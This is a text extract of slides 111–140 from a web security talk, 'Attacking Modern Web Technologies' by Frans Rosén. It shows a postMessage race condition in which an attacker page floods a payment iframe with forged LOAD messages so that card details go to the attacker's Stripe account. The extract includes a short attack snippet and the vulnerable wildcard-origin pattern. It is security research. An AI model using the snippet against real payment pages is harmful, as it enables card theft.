  111. 111. Author name her Vulnerable scenario Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe!
  112. 112. Author name her Opens PCI-certified domain for payment Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com
  113. 113. Author name her Iframe loaded, main frame sends INIT to iframe Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! iframe.postMessage('INIT', '*') foodpayments.com
  114. 114. Author name her Iframe registers the sender of INIT as msgTarget Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! iframe.postMessage('INIT', '*') if(e.data==INIT && originOK) { msgTarget = event.source msgTarget.postMessage('INIT','*') } foodpayments.com
  115. 115. Author name her Iframe tells main all is OK Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com if(e.data==INIT and e.source==iframe) { all_ok_dont_kill_frame() } msgTarget.postMessage('INIT','*')
  116. 116. Author name her Main window sends over provider data Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! if(INIT) {
 iframe.postMessage('["LOAD", "stripe","pk_abc123"]}’, '*') } foodpayments.com
  117. 117. Author name her Iframe loads payment provider and kills channel Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! if(INIT) { if(e.data[0]==LOAD && originOK) {
 initpayment(e.data[1], e.data[2])
 window.removeEventListener ('message', listener)
 } } foodpayments.com if(INIT) {
 iframe.postMessage('["LOAD", "stripe","pk_abc123"]}’, '*') }
  118. 118. Author name her Did you see it? Attacking Modern Web Technologies Frans Rosén @fransrosen
  119. 119. Author name her Open ilikefood.com from attacker Attacking Modern Web Technologies Frans Rosén @fransrosen exampleaco.nz ilikefood.com Subscribe!
  120. 120. Author name her Victim clicks subscribe, iframe is loaded Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com exampleaco.nz
  121. 121. Author name her Attacker sprays out LOAD to iframe Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com setInterval(function(){ child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]}’,'*')
 }, 100) exampleaco.nz
  122. 122. Author name her INIT-dance resolves, but attacker wins with LOAD Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com setInterval(function(){ child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]}’,'*')
 }, 100) 'INIT'<->'INIT' exampleaco.nz
  123. 123. Author name her LOAD kills listener, we won the race! Stripe loads… Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com exampleaco.nz Frame loads api.stripe.com?key=pk_diffkey…
  124. 124. Author name her It’s now the attacker’s Stripe account Attacking Modern Web Technologies Frans Rosén @fransrosen ilikefood.com Subscribe! foodpayments.com Enter credit card Pay! exampleaco.nz
  125. 125. Author name her Payment will fail for site… Attacking Modern Web Technologies Frans Rosén @fransrosen foodpayments.com Payment failed :(
  126. 126. Author name her Payment will fail for site…but worked for Stripe! Attacking Modern Web Technologies Frans Rosén @fransrosen foodpayments.com Payment failed :(
  127. 127. Author name her From Stripe-logs we can charge the card anything! Attacking Modern Web Technologies Frans Rosén @fransrosen
  128. 128. Author name her From Stripe-logs we can charge the card anything! Attacking Modern Web Technologies Frans Rosén @fransrosen
  129. 129. Author name her Client-Side Race Condition #2 Attacking Modern Web Technologies Frans Rosén @fransrosen postMessage from opener between two other postMessage-calls Chrome seems to be the only one allowing this to happen afaik.
  130. 130. Author name her postMessage-tracker Speedbumps Attacking Modern Web Technologies Frans Rosén @fransrosen
  131. 131. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 1: Function-wrapping, Raven.js, rollbar, bugsnag, NewRelic Before: postMessage-tracker Speedbumps
  132. 132. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 1: Function-wrapping, Raven.js, rollbar, bugsnag, NewRelic Before: After: Solution: Find wrapper and jump over it. console better due to this! postMessage-tracker Speedbumps
  133. 133. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 2: jQuery-wrapping, such a mess (diff btw version) Before: postMessage-tracker Speedbumps
  134. 134. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 2: jQuery-wrapping, such a mess (diff btw version) Before: After: Solution: Use either ._data, .expando or .events from jQuery object! postMessage-tracker Speedbumps
  135. 135. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 3: Anonymous functions. Could not identify them at all. Before: postMessage-tracker Speedbumps
  136. 136. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen • Problem 3: Anonymous functions. Could not identify them at all. Before: After: Solution: Can’t extract using Function.toString() in Chrome :( Will however at least show them as tracked now postMessage-tracker Speedbumps
  137. 137. Author name her postMessage-tracker released? Attacking Modern Web Technologies Frans Rosén @fransrosen No :( I suck. "Soon"?
  138. 138. Author name her postMessage-tracker released? Attacking Modern Web Technologies Frans Rosén @fransrosen No :( I suck. "Soon"? Want to complete more features!
  139. 139. Author name her postMessage-tracker released? Attacking Modern Web Technologies Frans Rosén @fransrosen No :( I suck. "Soon"? Want to complete more features! • Trigger debugger to breakpoint messages (since we own the order) • Try to see if .origin is being used and how • If regex, run through Rex!
  140. 140. detectify Frans Rosén (@fransrosen) That’s it!

×